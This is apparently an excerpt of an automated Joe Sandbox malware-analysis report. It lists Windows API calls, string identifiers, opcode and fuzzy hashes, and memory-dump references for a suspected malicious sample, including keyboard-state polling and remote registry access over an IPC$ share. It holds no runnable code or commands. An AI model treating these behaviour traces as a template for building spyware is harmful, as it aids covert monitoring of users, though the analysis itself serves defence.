                                                                                                                                                                                                                                                                                                        • Instruction ID: 11e5634b444e5e95d8e4ba3c4428fb6ed63c7f308aa8be21d88f406477a53913
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 882903a87cf239ca239bae25e6b56d959b61aa0c0da30b21d873fe86fcb8ef48
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF41CE79600644AFDB305F7D9888BBD3B65AB56330F144245FAE29B2E5C7368D42EB10
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,01000D31,00000001,0000138C,00000001,00000000,00000001,?,0102EEAE,01082430), ref: 0101A091
                                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000,?,01000D31,00000001), ref: 0101A09A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,01000D31,00000001,0000138C,00000001,00000000,00000001,?,0102EEAE,01082430,?), ref: 0101A0BC
                                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000,?,01000D31,00000001), ref: 0101A0BF
                                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0101A1E0
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                                        • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                                        • Opcode ID: 039f5098746f0eeea4f03c39a60266240c0c441e11e314af0bca88b38fb7cdbf
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9ab83dcf99cee7ec7fa8a5d8fa03607ad94a76862499cc25c12d7efbcb100c63
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 039f5098746f0eeea4f03c39a60266240c0c441e11e314af0bca88b38fb7cdbf
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01416C7290020DAACB11FBE1DD86EEEB778AF58340F104065B641B6096EB7D6F09DF61
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
                                                                                                                                                                                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 01011093
                                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 010110AF
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 010110CB
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 010110F5
                                                                                                                                                                                                                                                                                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0101111D
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 01011128
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0101112D
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                                        • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9a35c9c3e4576b5785beae7a1272fc3933ee90acf12f6ba5150128297943524d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 76d91ac8155f50e515d29b9ab511a067888119cc1c1567834cd56e1137637776
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a35c9c3e4576b5785beae7a1272fc3933ee90acf12f6ba5150128297943524d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46413876D00229ABDF25EBA5DC85DEEB7B8BF08740F004069F941A3161EB799E04DF50
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 01044AD9
                                                                                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 01044AE0
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 01044AF3
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 01044AFB
                                                                                                                                                                                                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 01044B06
                                                                                                                                                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 01044B10
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 01044B1A
                                                                                                                                                                                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 01044B30
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 01044B3C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                                        • String ID: static
                                                                                                                                                                                                                                                                                                        • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7b7f4b70d0245c284733accf744c9ea3250ee9917b527d5bdbce99b9199741b9
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1412636121e53a6de4b4ccb246ad3e35ceb963cb80dacc89db89306e2640bb6d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b7f4b70d0245c284733accf744c9ea3250ee9917b527d5bdbce99b9199741b9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D13181B5100215BBDF229FA4DD88FDA3BA9FF1D324F110221FA94E6190C77AD860DB94
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 010346B9
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 010346E7
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 010346F1
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0103478A
                                                                                                                                                                                                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 0103480E
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 01034932
                                                                                                                                                                                                                                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0103496B
                                                                                                                                                                                                                                                                                                        • CoGetObject.OLE32(?,00000000,01050B64,?), ref: 0103498A
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 0103499D
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01034A21
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 01034A35
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 08c071a33afa4200180766af11f7014ddbb63116af17277a2128455fe4a725b4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9e14986a03c594a951ffe09b4667c803c1b998be1dbf5c6c848ab72827e57eb8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08c071a33afa4200180766af11f7014ddbb63116af17277a2128455fe4a725b4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93C111B5608305AF9700DF68C88496BBBE9FF89748F00495DF98ADB250DB31ED46CB52
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 01028538
                                                                                                                                                                                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 010285D4
                                                                                                                                                                                                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 010285E8
                                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(01050CD4,00000000,00000001,01077E8C,?), ref: 01028634
                                                                                                                                                                                                                                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 010286B9
                                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 01028711
                                                                                                                                                                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0102879C
                                                                                                                                                                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 010287BF
                                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 010287C6
                                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 0102881B
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 01028821
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5678c966d5859d3bb94b73ddf4e335ffafccc551bdd1e968ebd4ebd121978f83
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4e5dbc31c9cca789bd7a83067ba3e2d665203dd0de4887a0256c813718ffdc50
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5678c966d5859d3bb94b73ddf4e335ffafccc551bdd1e968ebd4ebd121978f83
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FEC14B79A00119AFDB10DFA4C888DAEBBF9FF48304B148099E959DB261CB35ED45CF90
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0101039F
                                                                                                                                                                                                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 010103F8
                                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0101040A
                                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0101042A
                                                                                                                                                                                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0101047D
                                                                                                                                                                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 01010491
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 010104A6
                                                                                                                                                                                                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 010104B3
                                                                                                                                                                                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 010104BC
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 010104CE
                                                                                                                                                                                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 010104D9
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: bbddcf9297cc0680b289a4c02340fd893d08df7d79fe1079cbc4696389e19921
                                                                                                                                                                                                                                                                                                        • Instruction ID: 015a0a4951871f7b02a52195682263bafc30f63d45ae7ad3e00db152ca9a19d1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bbddcf9297cc0680b289a4c02340fd893d08df7d79fe1079cbc4696389e19921
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 964183B5A00219EFCB10DFA4D8849EE7BB9FF58354F008069F985A7255CB39E985CF90
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 0101A65D
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 0101A6DE
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 0101A6F9
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 0101A713
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 0101A728
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 0101A740
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 0101A752
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0101A76A
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(00000012), ref: 0101A77C
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 0101A794
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 0101A7A6
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0b491498ef64f47fec439e00c5e4dccc73d34b1933a64a9146b67a6338593d63
                                                                                                                                                                                                                                                                                                        • Instruction ID: f7663c968fe080c1d0d1010a9f7a5e4d85cfe77a24652fdc0a72f4e74beb81ec
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b491498ef64f47fec439e00c5e4dccc73d34b1933a64a9146b67a6338593d63
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4041C5B47067C5AAFFB2866889443A5BEF07B05304F048499D6C7471C7DBAC96C887A2
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                                        • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3687e0a8c1178b047829e9d2a8669dc88b1256409b372839e7f9a473ba5c08fc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5f6b087afce38944f23aec9fc6045d715370beefa673b2f027918a6f3164605f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3687e0a8c1178b047829e9d2a8669dc88b1256409b372839e7f9a473ba5c08fc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6351D531A00117EBCB15DF6CC9508FEB7E9BF94368720426AE8A6E7385D775D940C790
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32 ref: 010341D1
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 010341DC
                                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,01050B44,?), ref: 01034236
                                                                                                                                                                                                                                                                                                        • IIDFromString.OLE32(?,?), ref: 010342A9
                                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 01034341
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 01034393
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                                        • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0c7dd7b1087a9c1a5eabe36b5b22dc40cefabc09118dd4e4436b68c5e808a66b
                                                                                                                                                                                                                                                                                                        • Instruction ID: d0770d24a5412b1048de38d97ef580c8a69dc43b74b07aa33ffcfd062caf2838
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c7dd7b1087a9c1a5eabe36b5b22dc40cefabc09118dd4e4436b68c5e808a66b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8619C71608301AFD310DFA5C888BAEBBE8AF89714F00494DF9C5EB291C774E944CB92
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 01028C9C
                                                                                                                                                                                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 01028CAC
                                                                                                                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01028CB8
                                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01028D55
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 01028D69
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 01028D9B
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 01028DD1
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 01028DDA
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                                        • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                                                        • Opcode ID: 067f16f2b017f7af9de81c08fe7a06f572e11704a9ec4380060a05a1767d00f9
                                                                                                                                                                                                                                                                                                        • Instruction ID: ce84d1f6be9b14dff057df18fce55f14698ca83544b191ff7837f18925064b43
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 067f16f2b017f7af9de81c08fe7a06f572e11704a9ec4380060a05a1767d00f9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 346169B65043159FD710EF64C88499EB7E8FF98310F04885EE9C987251DB39E945CF92
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateMenu.USER32 ref: 01044715
                                                                                                                                                                                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 01044724
                                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 010447AC
                                                                                                                                                                                                                                                                                                        • IsMenu.USER32(?), ref: 010447C0
                                                                                                                                                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 010447CA
                                                                                                                                                                                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010447F7
                                                                                                                                                                                                                                                                                                        • DrawMenuBar.USER32 ref: 010447FF
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                                        • String ID: 0$F
                                                                                                                                                                                                                                                                                                        • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                                                        • Opcode ID: 03e517971d16b23be3d13440d249de5d65223f4cbee49af36122f23dd6eb3f33
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1129696f6bc92b7eb02431baa5b8aee313fce78c859780400f66b6560e13eb28
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03e517971d16b23be3d13440d249de5d65223f4cbee49af36122f23dd6eb3f33
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E94189B8A01209AFEB24CFA8D984BAE7BF5FF09314F04406CFA8597341C775A914CB90
                                                                                                                                                                                                                                                                                                        APIs
